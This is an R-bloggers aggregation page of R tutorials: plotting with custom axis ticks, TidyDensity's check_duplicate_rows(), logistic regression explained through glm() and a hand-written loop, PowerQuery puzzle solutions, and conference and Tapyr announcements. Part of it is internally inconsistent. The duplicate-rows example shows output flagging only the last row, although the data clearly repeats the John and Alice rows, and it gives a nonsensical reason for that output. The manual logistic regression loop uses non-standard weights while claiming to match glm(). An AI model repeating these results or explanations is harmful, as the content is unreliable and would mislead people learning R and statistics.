[This article was first published on R Archives » Data Science Tutorials, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

The post How to add Axes to Plot in R appeared first on Data Science Tutorials

In data visualization, creating visually appealing and informative plots is crucial for effectively communicating insights.

The R programming language offers a plethora of tools to customize your plots, including the ability to add user-defined axis ticks using the axis() function.

In this article, we will walk you through three examples that demonstrate how to create plots with custom axis ticks in R.

Example 1: Draw Plot with Default Axis Ticks

Before diving into custom axis ticks, let’s first learn how to draw a basic plot with default axis specifications.

The plot() function in R can be used to create a scatterplot, as shown in the code snippet below:

plot(1:200)           # Default plot

This code will generate a scatterplot with default axis values.

Example 2: Plot with Specified Axis Ticks

Now, let’s move on to adding user-defined axis ticks using the axis() function. First, we need to create a graph without any axis values:

plot(1:200,           # Plot without axes
     xaxt = "n",
     yaxt = "n")

Once the plot is created without axes, we can use the axis() function to add axis values.

The side parameter is used to specify which axis to modify, with 1 representing the x-axis and 2 representing the y-axis.

The c() function is used to define the tick values for the respective axis:

axis(side = 1,                        # Draw x-axis
     at = c(0, 50, 100, 150, 200))    # Example tick positions
axis(side = 2,                        # Draw y-axis
     at = c(10, 50, 150))             # Example tick positions
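
The axis() function also accepts a labels argument, so the text printed at each tick does not have to be the tick value itself. The following is a minimal sketch of that idea; the tick positions come from the example above, while the label text ("low", "mid", "high") and the variable names are made up for illustration.

```r
# Tick positions from Example 2; the label text is an illustrative assumption
x_ticks <- c(0, 50, 100, 150, 200)
y_ticks <- c(10, 50, 150)
y_labels <- c("low", "mid", "high")

plot(1:200,                 # Plot without axes
     xaxt = "n",
     yaxt = "n")
axis(side = 1, at = x_ticks)                      # Numeric labels by default
axis(side = 2, at = y_ticks, labels = y_labels)   # Custom text labels
```

The labels vector needs one entry per tick position given in at.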

Example 3: Plot with Axis Mark on Top & Right Side

In some cases, you may want to add axis ticks on the top and right side of the plot.

This can be achieved using the same R code as in the previous example, but with different values for the side parameter.

Instead of 1 and 2, we will use 3 and 4 to represent the top and right axes, respectively:

plot(1:200,                      # Plot without axes
     xaxt = "n",
     yaxt = "n")
axis(side = 3,                   # Add axis on top
     at = c(0, 50, 100, 200))    # Example tick positions
axis(side = 4,                   # Add axis on right side
     at = c(0, 50, 110))         # Example tick positions

To leave a comment for the author, please follow the link and comment on their blog: R Archives » Data Science Tutorials.

Continue reading: How to add Axes to Plot in R

Introducing check_duplicate_rows() from TidyDensity

Steven P. Sanderson II, MPH — Wed, 01 May 2024 04:00:00 +0000

[This article was first published on Steve's Data Tips and Tricks, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

Introduction

Today, we’re diving into a useful new function from the TidyDensity R package: check_duplicate_rows(). This function is designed to efficiently identify duplicate rows within a data frame, providing a logical vector that flags each row as either a duplicate or unique. Let’s explore how this function works and see it in action with some illustrative examples.

Understanding `check_duplicate_rows()`

The check_duplicate_rows() function takes a single argument, .data, which should be a data frame. It then compares each row of the data frame to every other row to identify duplicates based on complete row matches.

check_duplicate_rows(.data)

Examples

Let’s start by demonstrating how this function operates with two scenarios: one where there are no duplicate rows, and another where there are duplicate rows with identical values in specific columns.

Example 1: No Duplicates

First, let’s create a data frame where all rows are unique. We’ll use the iris dataset for this example:

# Load required libraries
library(TidyDensity)

# Create a data frame (iris dataset)
data_no_duplicates <- iris

# Check for duplicate rows
duplicates <- check_duplicate_rows(data_no_duplicates)

# View the result
any(duplicates)

[1] FALSE

In this case, the duplicates vector will contain only FALSE values, indicating that no rows in iris are exact duplicates of each other.

Example 2: Duplicate Rows

Next, let’s create a scenario where some rows contain identical values in specific columns. We’ll manually construct a data frame for this purpose:

# Create a data frame with duplicate rows
data_with_duplicates <- data.frame(
  Name = c("John", "Alice", "John", "Bob", "Alice","David"),
  Age = c(25, 30, 25, 40, 30, 50),
  Score = c(85, 90, 85, 75, 90, 50)
)

# Check for duplicate rows
duplicates <- check_duplicate_rows(data_with_duplicates)

# View the result
duplicates

[1] FALSE FALSE FALSE FALSE FALSE  TRUE

In this example, the duplicates vector indicates which rows are flagged as duplicates (TRUE for duplicates, FALSE for unique rows). In the output above, only the last row is flagged, and it is the row where the Age and Score columns hold the same value (50).
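
For comparison, base R's duplicated() can be run on the same data frame. This is only a reference point using a different function, not a description of how check_duplicate_rows() works internally; the variable names dup_later and dup_any are made up for this sketch.

```r
data_with_duplicates <- data.frame(
  Name = c("John", "Alice", "John", "Bob", "Alice", "David"),
  Age = c(25, 30, 25, 40, 30, 50),
  Score = c(85, 90, 85, 75, 90, 50)
)

# Flags the second and later occurrences of a complete row match
dup_later <- duplicated(data_with_duplicates)
dup_later
# [1] FALSE FALSE  TRUE FALSE  TRUE FALSE

# Flags every row that has a complete match anywhere in the data frame
dup_any <- dup_later | duplicated(data_with_duplicates, fromLast = TRUE)
dup_any
# [1]  TRUE  TRUE  TRUE FALSE  TRUE FALSE
```

Here rows 1 and 3 (John) and rows 2 and 5 (Alice) match across all three columns, which is why base R flags them.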

Conclusion

The check_duplicate_rows() function in the TidyDensity package is a handy tool for identifying duplicate rows within a data frame. It can be particularly useful for data cleaning and quality assurance tasks, ensuring that datasets are free from unintended duplicates that could skew analysis results.

If you work with data frames and want a straightforward way to detect duplicate rows efficiently, consider incorporating check_duplicate_rows() into your R workflow with TidyDensity. This function exemplifies the package’s commitment to providing practical, user-friendly tools for data manipulation and analysis.

That wraps up our overview of check_duplicate_rows(). We hope you find this function useful in your data analysis endeavors! If you have any questions or feedback, feel free to reach out in the comments below. Until next time, happy coding with R!

To leave a comment for the author, please follow the link and comment on their blog: Steve's Data Tips and Tricks.

Continue reading: Introducing check_duplicate_rows() from TidyDensity

Logistic regression is not advanced ‘machine learning’ or ‘artificial intelligence’

pacha.dev/blog — Wed, 01 May 2024 04:00:00 +0000

[This article was first published on pacha.dev/blog, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

Motivation

One of the most common comments I hear is that logistic regression (also called Binomial regression) is some kind of “advanced magic”, “machine learning”, “artificial intelligence” or “big data”. This is not true.

In this post, I will show you how logistic regression works and why it is not as complex as some people think.

Explanation

Logistic regression consists of transforming the data and then fitting a linear regression (ordinary least squares) repeatedly until convergence.

The differences with the classic linear model are:

It uses a binary dependent variable (e.g., heads or tails when we flip a coin, which we can express as 0/1). The linear model takes a continuous variable (e.g., the temperature in a city) as the dependent variable.
It uses an exponential function to transform the data before fitting a regression.
It returns estimated probabilities (e.g., 0.42, 0.91, …, 0.47) that we can convert to 0/1 by using a threshold (e.g., all the values over 0.5 become 1).
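
The transformation and the threshold step can be sketched in a few lines. The input values in eta are arbitrary numbers chosen for illustration; plogis() is the built-in logistic function in base R.

```r
# Arbitrary values of the linear predictor (illustrative only)
eta <- c(-2, 0, 2)

# Logistic transformation: maps any real number to a probability in (0, 1)
p <- exp(eta) / (1 + exp(eta))

# Same result with the built-in logistic function
all.equal(p, plogis(eta))
# [1] TRUE

# Convert probabilities to 0/1 with a 0.5 threshold
as.integer(p > 0.5)
# [1] 0 0 1
```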

Before we continue, and in case you want to read more, logistic regression is part of the Generalized Linear Models (GLM) family. This family includes other models such as Gaussian (i.e., “normal” or “classic” regression), Poisson, Gamma, and others that have the exponential function in their formula. Some books, such as Casella and Berger, refer to them as the “exponential family”.

Worked example

In base R, we can use the glm function to fit a logistic regression model. Let’s use the mtcars dataset to predict the transmission type of a car (am, coded as 0 for automatic and 1 for manual) as a function of its miles per gallon (mpg).

R commands follow the previous explanation about a general family of models. We will use the family argument to specify the type of model we want to fit, which in this case is binomial.

coef(glm(am ~ mpg, data = mtcars, family = binomial))

(Intercept)         mpg 
 -6.6035267   0.3070282

Leaving the statistical significance aside, the second estimated coefficient (0.307) indicates that more miles per gallon are associated with a higher probability of having a manual transmission.

We can predict the probability of having a manual transmission for the cars in the dataset.

am_pred <- predict(glm(am ~ mpg, data = mtcars, family = binomial), type = "response")
head(am_pred)

        Mazda RX4     Mazda RX4 Wag        Datsun 710    Hornet 4 Drive 
        0.4610951         0.4610951         0.5978984         0.4917199 
Hornet Sportabout           Valiant 
        0.2969009         0.2599331

To convert this probability to a binary outcome, we can use a threshold of 0.6 (arbitrary).

am_pred_binary <- ifelse(am_pred > 0.6, 1, 0)
head(am_pred_binary)

        Mazda RX4     Mazda RX4 Wag        Datsun 710    Hornet 4 Drive 
                0                 0                 0                 0 
Hornet Sportabout           Valiant 
                0                 0

This can be compared with the actual data.

head(mtcars$am)

[1] 1 1 1 0 0 0

For a better comparison, we can use a confusion matrix, which shows the number of true positives, true negatives, false positives, and false negatives.

table(am_pred_binary, mtcars$am)

              
am_pred_binary  0  1
             0 18  7
             1  1  6

This matrix shows that the proposed model is not good at predicting the transmission type of the cars in the dataset. There are eight cases (out of 32) where the model predicted the incorrect transmission type. Adding more variables to the model may improve this, but that would be for another post.
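
One way to summarise the matrix in a single number is the accuracy, the share of cases on the diagonal. The sketch below recomputes the matrix with the same model and the same 0.6 threshold; the names fit, conf_mat and accuracy are introduced here for illustration.

```r
fit <- glm(am ~ mpg, data = mtcars, family = binomial)
am_pred_binary <- ifelse(predict(fit, type = "response") > 0.6, 1, 0)

# Rows are predictions, columns are the observed transmission type
conf_mat <- table(predicted = am_pred_binary, actual = mtcars$am)

# Accuracy: correctly classified cars divided by all cars
accuracy <- sum(diag(conf_mat)) / sum(conf_mat)
accuracy
```

With the matrix shown above, this works out to (18 + 6) / 32 = 0.75.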

It is possible to obtain the same coefficients as the glm() function by transforming the data following the Binomial regression “recipe” and then running lm() repeatedly until reaching convergence. However, this is very impractical and shown for explanatory purposes only.

# original variables
y <- mtcars$am
x <- mtcars$mpg

# apply the recipe: define the new variables
mu <- (y + 0.5) / 2
eta <- log(mu / (1 - mu))
z <- eta + (y - mu) / mu

# iterate with initial values for the difference and the sum of sq residuals

dif <- 1
rss1 <- 1
tol <- 1e-10

while (abs(dif) > tol) {
  fit <- lm(z ~ x, weights = mu)
  eta <- z - fit$residuals
  mu <- exp(eta) / (1 + exp(eta))
  z <- eta + (y - mu) / mu
  res <- y - mu
  rss2 <- sum(res^2)
  dif <- rss2 - rss1
  rss1 <- rss2
}

coef(lm(z ~ x, weights = mu))

(Intercept)           x 
 -6.6035267   0.3070282

That’s it, in a few lines we wrote a straightforward code to fit a logistic regression. This is not magic, machine learning, or artificial intelligence. It is just a linear model repeated multiple times and it is tractable.
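
For comparison, here is a sketch of the textbook form of the same idea, iteratively reweighted least squares, where both the working weights and the working response use mu * (1 - mu). The loop above weights by mu instead. Both versions stop at a point where the weighted residuals of y - mu are orthogonal to the regressors, which is the condition the logistic regression estimates satisfy. The variable names, the cap of 50 iterations, and the tolerance are choices made for this sketch.

```r
y <- mtcars$am
x <- mtcars$mpg

# Same starting values as in the loop above
mu <- (y + 0.5) / 2
eta <- log(mu / (1 - mu))
beta_old <- c(0, 0)

for (i in 1:50) {
  w <- mu * (1 - mu)               # working weights
  z <- eta + (y - mu) / w          # working response
  fit <- lm(z ~ x, weights = w)    # one weighted least squares step
  beta_new <- unname(coef(fit))
  eta <- beta_new[1] + beta_new[2] * x
  mu <- 1 / (1 + exp(-eta))
  if (max(abs(beta_new - beta_old)) < 1e-10) break
  beta_old <- beta_new
}

# Compare with glm()
rbind(
  irls = beta_new,
  glm = unname(coef(glm(am ~ mpg, data = mtcars, family = binomial)))
)
```

The stopping rule here checks the change in the coefficients rather than the change in the residual sum of squares, which is only one of several reasonable convergence criteria.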

If you liked this post

I wrote The Hitchhiker’s Guide to Linear Models, which covers regression starting with high school math and builds up the explanations until reaching Binomial, Poisson and Tobit models. You can get it for free or pay a suggested price of 10 USD.

To leave a comment for the author, please follow the link and comment on their blog: pacha.dev/blog.

Continue reading: Logistic regression is not advanced ‘machine learning’ or ‘artificial intelligence’

R/Medicine is coming June 10-14, 2024 – See Top Five R Medicine Talks from Previous Years

R Consortium — Tue, 30 Apr 2024 15:57:07 +0000

[This article was first published on R Consortium, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

Want to get a feel for the kind of content that will be available at R/Medicine 2024? We’re spotlighting the most engaging and educational sessions from past R Medicine Virtual Conferences. Whether you’re a healthcare professional, a data scientist, or simply curious about the intersection of healthcare and technology, these selected talks offer a wealth of knowledge and innovation using the R programming language. Dive into these sessions to enhance your understanding and skills in medical data science.

Register for the R Medicine 2024 Virtual Conference here!

1. GitHub Copilot in RStudio, It’s Finally Here! – R Medicine Virtual Conference 2023

This session introduces GitHub Copilot for RStudio, a highly anticipated tool that enhances coding efficiency and innovation in medical research. Watch as experts demonstrate its capabilities and potential impact on healthcare data analysis.

2. Analyzing Geospatial Data in R (Sherrie Xie) – R/Medicine 2022 Virtual Conference

Featuring Sherrie Xie, this presentation explores the applications of geospatial data analysis within the healthcare sector using R. Gain insights into the importance of spatial data in understanding health trends and outcomes.

3. R/Medicine 101: Intro to R for Clinical Data (Stephan Kadauke, Joe Rudolf, Patrick Mathias) – R/Medicine 2022

This introductory session is perfect for those new to using R in a clinical setting. The speakers guide you through the basics and demonstrate how R can revolutionize medical research and patient care.

4. Introduction to R for Medical Data: Tidy Spreadsheets in Medical Research – R/Medicine 2021

UMich Prof and {medicaldata} author Peter Higgins will cover best practices for using medical data in spreadsheets like Excel and Google Sheets.

5. Multistate Data Using the {survival} Package – R/Medicine 2021

Explore the use of the {survival} package in R for analyzing multistate data. Discover the methods and models that are shaping the future of survival analysis in medical research.

Engage and Learn More!

Each of these sessions provides unique insights and practical tools for harnessing the power of R in medical research and healthcare analytics. Whether you are watching these for the first time or revisiting them, each video promises a deep dive into the capabilities of R that are driving advancements in the field.

Mark Your Calendars! The R Medicine Conference for this year is scheduled for June 10-14. Register now to secure your spot and connect with a community of like-minded professionals!

Register for the R Medicine 2024 Virtual Conference here!

Remember to subscribe to the R Medicine channel for more updates and upcoming conference information. Enhance your skills in medical data science today!

The post R/Medicine is coming June 10-14, 2024 – See Top Five R Medicine Talks from Previous Years appeared first on R Consortium.

To leave a comment for the author, please follow the link and comment on their blog: R Consortium.

Continue reading: R/Medicine is coming June 10-14, 2024 – See Top Five R Medicine Talks from Previous Years

Introducing Tapyr: Create and Deploy Enterprise-Ready PyShiny Dashboards with Ease

Gift Kenneth — Tue, 30 Apr 2024 14:28:32 +0000

[This article was first published on Tag: r - Appsilon | Enterprise R Shiny Dashboards, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

Are you an R/Shiny user looking to leverage the incredible capabilities of Shiny for Python without sacrificing the familiarity and comfort of your existing tools?

Introducing Tapyr, our Shiny for Python framework. It brings Rhino-like capabilities from the R world and more to the Shiny for Python ecosystem, helping you build enterprise-ready applications with ease.

Curious about Shiny for Python from an R Shiny dev’s perspective? Check out this blog post to learn more.

Tapyr is designed as a lightweight template repository for PyShiny projects that offers tools similar to Rhino for R/Shiny. For instance, Tapyr introduces poetry, which handles project dependencies much like renv in R. This ensures that R users can smoothly adapt to Python without tackling a steep learning curve while adhering to best practices from day 0.

Key Features of Tapyr

Leverage Python Tools: Tapyr takes advantage of Python’s ecosystem tools, including ruff, pytest, and others.
Enterprise-Ready Applications, Made Easy: The framework is tailored for building robust, scalable, and production-ready applications.
Comprehensive Testing with Playwright: Say goodbye to the hassle of juggling multiple languages for end-to-end testing. Tapyr leverages Playwright, integrated with pytest, allowing you to write all tests in Python – a streamlined approach that keeps your coding practices consistent and efficient.
Static Type Checking with PyRight: Improve code quality and reduce bugs with PyRight, a static type checking feature not available in R. This proactive error detection ensures your applications are reliable, before you even start them.

Complementing Existing Resources

While Posit’s PyShiny templates cater to exploratory data analysis, Tapyr serves a distinct, complementary role by providing a structured repository designed to kickstart your projects. This approach focuses on developing comprehensive, scalable and future-proof applications.

This not only expands the tools available to data scientists and developers but also helps you to tackle larger, more complex projects effectively.

Tapyr is ideal for data scientists (transitioning from R to Python), developers familiar with Shiny and Rhino building projects in PyShiny, and academic researchers and enterprise professionals requiring enterprise-level dashboard frameworks.

Getting Started with Tapyr

Using Devcontainer

We recommend using the Dev Container configuration with Visual Studio Code (VS Code) or DevPod to ensure a consistent development experience across different computers and environments. It may sound complicated, but it is easy to set up.

The Dev Container is like a virtual environment with everything you need to work on the project, including all the required software and dependencies.

Install the Dev Containers extension if you don’t have it already.

Clone the repository and start the dev container: You can clone the Tapyr repository from GitHub or download the source code.
1. Navigate to the project directory and open the project in VS Code.
2. Select “Reopen in Container” when prompted.
3. If you are not prompted, open the Command Palette (Ctrl+Shift+P on Windows/Linux, or Cmd+Shift+P on Mac) and choose “Dev Containers: Reopen in Container” (shown as “Remote-Containers: Reopen in Container” in older versions of the extension).
4. If you’re using DevPod, follow their instructions to start the Devcontainer.

Activate the virtual environment: Once the Dev Container is running, activate the virtual environment (a dedicated workspace where all the project’s dependencies are installed). Run the following command:

poetry shell

Run the application: Now you’re ready to run the application! Use this command:

shiny run app.py --reload

This will start the application and automatically reload it whenever you make changes to the code.

Execute tests: To run tests and ensure everything is working correctly, use this command:

poetry run pytest

If you prefer to run the project locally instead of in a Dev Container, you can do so using Poetry.

Struggling with Quality Assurance for your Shiny for Python Dashboards? Check out this blog post to learn more about leveraging Playwright.

Get Started Today

Dive into Tapyr and start building your enterprise-level applications today!

Download Tapyr, check out the documentation, explore its functionalities, and join the community of innovators expanding their PyShiny skillsets.

We value your feedback, so please share your experiences and suggestions to help us improve Tapyr in our Shiny community.

FAQs

Q: Is there a community or support available for Tapyr users?

A: You can create a pull request, open an issue, follow our documentation, and engage with other users in our community to get support, share insights, and contribute to the project’s development.

Q: How is Tapyr different from Posit’s PyShiny templates?

A: While Posit’s PyShiny templates focus on exploratory data analysis, Tapyr is a framework focused on building comprehensive, scalable PyShiny applications.

Q: How does Tapyr compare to other tools like reticulate?

A: While reticulate allows you to call Python from R, Tapyr takes a different approach by providing a streamlined framework for building enterprise-ready applications using Shiny for Python. Since all the code is written in Python, it offers features like static type checking, comprehensive testing with Playwright, and seamless integration with the Python ecosystem.

The post appeared first on appsilon.com/blog/.

To leave a comment for the author, please follow the link and comment on their blog: Tag: r - Appsilon | Enterprise R Shiny Dashboards.

Continue reading: Introducing Tapyr: Create and Deploy Enterprise-Ready PyShiny Dashboards with Ease

PowerQuery Puzzle solved with R

Numbers around us — Tue, 30 Apr 2024 12:24:49 +0000

[This article was first published on Numbers around us - Medium, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

#177–178

Puzzles

Author: ExcelBI

All files (xlsx with puzzle and R with solution) for each and every puzzle are available on my Github. Enjoy.

Puzzle #177

We are about to create reports for three students, each of whom has to pass three exams in every subject. If even one of those marks is lower than 40, the student fails the subject. Then we have to find the average of the total marks per student and rank the students according to it. Finally, we make a small adjustment in the first columns so that names are not repeated for every subject. Check the code.

Loading libraries and data

library(tidyverse)
library(readxl)

input = read_excel("Power Query/PQ_Challenge_177.xlsx", range = "A1:F10")
test  = read_excel("Power Query/PQ_Challenge_177.xlsx", range = "H1:M10")

Transformation

result = input %>%
  rowwise() %>%
  mutate(Result = if_else(any(c(Marks1, Marks2, Marks3) < 40), "Fail", "Pass"),
         total = Marks1 + Marks2 + Marks3) %>%
  ungroup() %>%
  mutate(average = mean(total), 
         rn = row_number(),
         .by = Name) 

aux_rank = result %>%
  select(Name, average) %>%
  distinct() %>%
  mutate(Rank = rank(-average))

result2 = result %>%
  left_join(aux_rank, by = "Name") %>%
  select(Name, Classs, Subject, `Total Marks` = total, Result, Rank, rn) %>%
  mutate(Name = ifelse(rn == 1, Name, NA_character_),
         Classs = ifelse(rn == 1, Classs, NA_real_),
         Rank = ifelse(rn == 1, Rank, NA_integer_)) %>%
  select(-rn)

Validation

identical(result2, test) 
#> [1] TRUE
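
The solution above needs the puzzle workbook, so here is a minimal sketch of the same pass/fail, ranking and name-blanking logic on a small made-up table. The student names and marks are hypothetical, and `pmin()` is swapped in as a vectorised alternative to the `rowwise()` plus `any()` check; it is not the approach used in the solution itself.

```r
library(dplyr)  # .by in mutate() assumes dplyr >= 1.1.0

# Hypothetical marks, not taken from the puzzle workbook
marks <- tibble::tribble(
  ~Name, ~Subject,  ~Marks1, ~Marks2, ~Marks3,
  "Ann", "Maths",   55,      62,      71,
  "Ann", "Physics", 38,      80,      90,
  "Bob", "Maths",   45,      50,      41,
  "Bob", "Physics", 60,      65,      70
)

report <- marks %>%
  mutate(
    # a subject is failed if the lowest of the three marks is below 40
    Result = if_else(pmin(Marks1, Marks2, Marks3) < 40, "Fail", "Pass"),
    total  = Marks1 + Marks2 + Marks3
  ) %>%
  # per-student average of totals and a row counter within each student
  mutate(average = mean(total), rn = row_number(), .by = Name)

# one row per student, ranked by descending average
ranks <- report %>%
  distinct(Name, average) %>%
  mutate(Rank = rank(-average)) %>%
  select(Name, Rank)

final <- report %>%
  left_join(ranks, by = "Name") %>%
  mutate(
    # keep Rank and Name only on the first row of each student
    Rank = if_else(rn == 1, Rank, NA_real_),
    Name = if_else(rn == 1, Name, NA_character_)
  ) %>%
  select(Name, Subject, `Total Marks` = total, Result, Rank)

print(final)
```

In this toy table only Ann's Physics row is marked "Fail" (one mark is 38), and Ann ranks first because her average total is higher than Bob's.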

Puzzle #178

HR should track how the people they hire advance in their positions and get promoted, but also whether they move to another department or employer. We have an input table containing records of such events, but we need it to be more readable. Let's pivot the data.

Loading libraries and data

library(tidyverse)
library(readxl)

input = read_excel("Power Query/PQ_Challenge_178.xlsx", range = "A1:E5")
test  = read_excel("Power Query/PQ_Challenge_178.xlsx", range = "H1:K5")

Transformation

result = input %>%
  pivot_longer(-Emp, names_to = "Change", values_to = "Value") %>%
  separate(Change, into = c("Type", "Change"), sep = " ") %>%
  pivot_wider(names_from = Type, values_from = Value) %>%
  drop_na() 

# One of my co-solvers asked why I didn't use a single pivot_longer call;
# see Anil Kumar Goyal's solution below.

input %>%
 pivot_longer(-Emp, names_to = c(".value", "Change"), names_sep = " ") %>%
 na.omit()

Validation

identical(result, test)
# [1] TRUE
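
To see what the `.value` sentinel in `names_to` does without the workbook, here is a minimal sketch on a made-up wide table. The employee names and the column names (`Position 1`, `Dept 1`, and so on) are assumptions chosen only to follow the "<field> <step>" pattern that the code above splits on; they are not the puzzle's actual columns. `drop_na()` is used in place of `na.omit()` for the final step.

```r
library(dplyr)
library(tidyr)

# Hypothetical wide table: one pair of columns per career step
wide <- tibble::tribble(
  ~Emp,  ~`Position 1`, ~`Dept 1`, ~`Position 2`, ~`Dept 2`,
  "Eva", "Analyst",     "Finance", "Manager",     "Finance",
  "Tom", "Clerk",       "Sales",   NA,            NA
)

long <- wide %>%
  pivot_longer(
    -Emp,
    # the part before the space becomes an output column (".value"),
    # the part after the space goes into the "Change" column
    names_to  = c(".value", "Change"),
    names_sep = " "
  ) %>%
  # drop steps that never happened (Tom has no second step)
  drop_na()

print(long)
```

Each employee ends up with one row per recorded step, with `Position` and `Dept` as regular columns, which is what the two-step `pivot_longer()`, `separate()` and `pivot_wider()` chain builds by hand.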

Feel free to comment, share, and contact me with advice, questions, and ideas on how to improve anything. You can also contact me on LinkedIn if you wish.

PowerQuery Puzzle solved with R was originally published in Numbers around us on Medium, where people are continuing the conversation by highlighting and responding to this story.

To leave a comment for the author, please follow the link and comment on their blog: Numbers around us - Medium.

Continue reading: PowerQuery Puzzle solved with R

R-bloggers

Test title

optim Function in R

optim Function in R

R Shiny Highcharts – How to Create Interactive and Animated Shiny Dashboards

Table of contents:

Exploring R Shiny Highcharts Dashboard Elements

Building the R Shiny Highcharts Dashboard

Summary Stats Cards

Basic Dashboard Styling

Adding Basic R Highcharts

Adding a Highcharts Drilldown Chart

Full Source Code

app.R

www/styles.css

Summing up R Shiny Highcharts

Estimating Shooting Performance Unlikeliness

Introduction

Data

Reproducing and adapting the UN Population Projections by @ellis2013nz

Reproducing UN projections

Adjusting the starting point

Compare numeric vectors in R

Compare numeric vectors in R

Example 1: we apply the ‘near’ function to our vectors

Example 2: Baisis User-Defined Tolerance

Summary

Highlights from ShinyConf 2024

Insightful Sessions and Memorable Speakers

Insightful Keynotes

New Open Source Package Announcement

Hex Logo Contest for Package Developers

What Package R You? Quiz

Redesign of Rhinoverse

Conclusion

Things that can go wrong when using renv

Binaries vs building from source

Beyond renv scope: incompatibility with system dependency versions

Expenditure-Based and Multivariate Weighted Indices: An R Package to Calculate CPI and Inflation

Conclusion

Why Use emWeightedCPI?

Get Started with emWeightedCPI Today!

CVE-2024-27322 Should Never Have Been Assigned And R Data Files Are Still Super Risky Even In R 4.4.0

FIN

Notes on Citing R and R Packages

Which software to cite

Where to get citation information

How to cite and version R and R packages

Examples

Exploring Data with TidyDensity’s tidy_mcmc_sampling()

Introduction

Understanding MCMC

Introducing tidy_mcmc_sampling()

Usage Example

Key Arguments

Visualizing Results

Try It Yourself!

Extract values from vector in R: dplyr

Extract values from vector in R

Example 1: nth Function

Example 2: nth Function with Negative Value

Example 3: first Function

Example 4: last Function

Conclusion

Ainulindalë in R: Orchestrating Data Pipelines for World Creation

Preparing the Instruments: Setting Up Your R Environment

Choosing the Right Libraries

Organizing Your Workspace

Project Management Practices

Gathering the Voices: Collecting Data

Understanding Data Sources

Using R to Import Data

Practical Tips for Efficient Data Collection

Refining the Harmony: Cleaning Data

Identifying Common Data Issues

Using R Packages for Data Cleaning

Techniques for Cleaning Data

Understanding `check_duplicate_rows()`